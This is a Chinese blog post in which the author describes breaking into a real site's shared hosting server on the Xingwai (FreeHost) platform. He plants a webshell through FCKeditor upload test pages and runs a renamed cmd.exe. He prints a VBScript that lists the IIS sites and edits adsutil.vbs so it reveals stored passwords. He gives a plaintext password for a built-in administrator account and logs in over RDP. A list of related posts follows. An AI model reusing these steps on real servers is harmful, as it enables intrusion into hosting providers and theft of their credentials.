php星外提权,一次星外虚拟主机的提权
今天看到个大马多功能防asp木马查杀内部测试版(有后门)看了下.换客网
www.taoyuanbao.com
小小检测了下绝对没啥可利用的。直接旁注几分钟拿下了个shell貌似运气好,随便打开个旁站。
手工输入 fckeditor路径 …。存在…
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
直接上传一句话。aspx的站 … 直接上大马…看了下路径d:\freehost 星外的主机。
在土司找到星外提权“新思路”
把cmd.exe改名成mutex.db扔到这个目录
c:\Program Files\360\360Safe\deepscan\Section\
把cmd路径改成c:\Program Files\360\360Safe\deepscan\Section\mutex.db
可以执行cmd了。继续
Set ObjService=GetObject(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject(“IIS://Localhost/W3SVC/” & obj3w.Name &
“/Root”)
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name),” “)
& obj3w.ServerComment & “(” & webSite.Path & “)” & vbCrLf
End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit
保存为1 直接执行 /c cscript d:\freehost\xxx\web\1.vbs
执行成功后就会列出IIS的基本信息了。
44260001 7i24虚拟主机管理平台受控端
(C:\WINDOWS\7i24.com\FreeHost)
在扔个adsutil.vbs上去,如果不能执行的话自己上传个cscript.exe
/c cscript d:\freehost\xxx\web\Adsutil.vbs enum w3svc/44260001/root
备注:如果密码不是明文密码,必须修改 Adsutil.vbs,使它显示明码。
请按照下列步骤操作:
1.在记事本中打开 Adsutil.vbs。
2.在”编辑”菜单上,单击查找,键入 IsSecureProperty = True,然后单击查找下一个。
3.将”IsSecureProperty = True”更改为”IsSecureProperty = False”。
4.保存对 Adsutil.vbs 所做的更改,然后关闭记事本。
7i24虚拟主机管理平台受控端
freehostrunat 83e0843d0091c43c4837bea224ebf197!7 (没加密直接登陆即可)
Freehostrunat这个用户是安装星外时候建立的,属于administrators用户组里的。
23000000 taoyuanbao.com_yiran8_yiran8(d:\freehost\yiran8\web)
登陆3389打开路径d:\freehost\yiran8\web搞定收工
没什么技术含量 大牛勿喷。BY:KOOK
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/68.html
php星外提权,一次星外虚拟主机的提权相关推荐
- 控制虚拟服务器的软件,虚拟主机控制面板
虚拟主机管理面板官方版是一款专为了虚拟机打造的控制工具.虚拟主机管理面板最新版集开通虚拟主机.ftp.空间.mysql数据库等功能为一体,运行安全.稳定.操作简便.虚拟主机管理面板软件支持磁盘配额.在 ...
- 虚拟主机有Linux么
虚拟主机有Linux么?有,虚拟主机不光有Windows系统,同样也有Linux系统.Linux是一种开放源代码的操作系统,由于它的自由开放性和技术先进性,顺应了广大软件开发商及用户对信息系统知情权的 ...
- 常见虚拟主机目录对照及星外提权目录
常见虚拟主机目录对照 D:\virtualhost\web580651\www\ 新网虚拟主机 F:\usr\fw04408\xpinfo\ 万网虚 ...
- 星外虚拟主机与php,星外虚拟主机提权拿服务器
本次是对自己的IDC服务器的一次友情检测. 本来服务器就已经拿了N次了.漏洞一直都放在那里. 结果总有人拿到权限就炫耀.至于吗.?我本来就打算去换空间去了. (还有仇家格我站,技术差我还不说什么.还到 ...
- 虚拟许可服务器访问失败,星外虚拟主机访问被控出现Unspecified error解决方法
今天客户在线解压出现了Unspecified error 的错误,我以为是被控的权限,重新重置了受控端依然不行,访问被控依然正常,但http://受控域名/freehost.dll就出现错误,看样子不 ...
- FreeHost星外虚拟主机管理平台
星外虚拟主机管理平台(FreeHost)是一套功能强大.技术领先.价格低廉的服务器自动化管理软件. 利用最先进的开发技术.实施最严密的测试.终于在2004年7月1日正式推出星外虚拟主机全功能版.此平台 ...
- php mysql 星外_星外虚拟主机跨web目录文件读取漏洞
星外虚拟主机跨目录读取文件漏洞,需要一定条件. 问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令: c:\windows\7i24IISLOG.exe ...
- 西部数码php.ini,西部数码虚拟主机提权思路
当前思路也可用于其他虚拟主机. 说明 西部数码虚拟主机安装后默认s-u的LocalAdministrator用户密码为root3306 就算修改了也是可以读取ini文件得到加密密码的 mysql 的r ...
- 虚拟主机封杀WebShell提权!
虚拟主机封杀WebShell提权! (2006-10-17 15:24:45) http://blog.sina.com.cn/s/blog_4560b80b010007py.html 转载▼ 分 ...
最新文章
- 【思维导图】redis
- 学多门计算机语言的好处,多学一门语言的19大好处
- FZU 1075 分解素因子【数论/唯一分解定理/分解素因子裸模板】
- css div漂浮向下,DIV+CSS固定底部的漂浮广告
- adf开发_ADF:动态视图对象
- centos php-mysql_centOS 下安装php和mysql
- python 用法 argparse.ArgumentParser()用法解析
- 最新的.net书籍教程 更新时间:2005-9-5
- catia 二次开发:高版本的catia vba项目在低版本的catia上运行,报错
- 创意网页排版设计和教程分享,打造 “视”不可挡的网页设计
- 惠普笔记本电脑驱动BIOS下载中心,战66驱动下载
- VastBase技术实践
- MATLAB图形绘制--极坐标和对数图像
- 微型计算机中的rom跟ram关系,STC单片机内部扩展RAM的应用
- 快速切换清华源、百度源的方法
- jQuery.ajax 使用点滴
- 程序员面试必备,HR 的那些黑话大全,太真实了!
- 如何通过js关闭微信浏览器页面
- Java程序在内存中运行详解
- ffmpeg 按帧数截取视频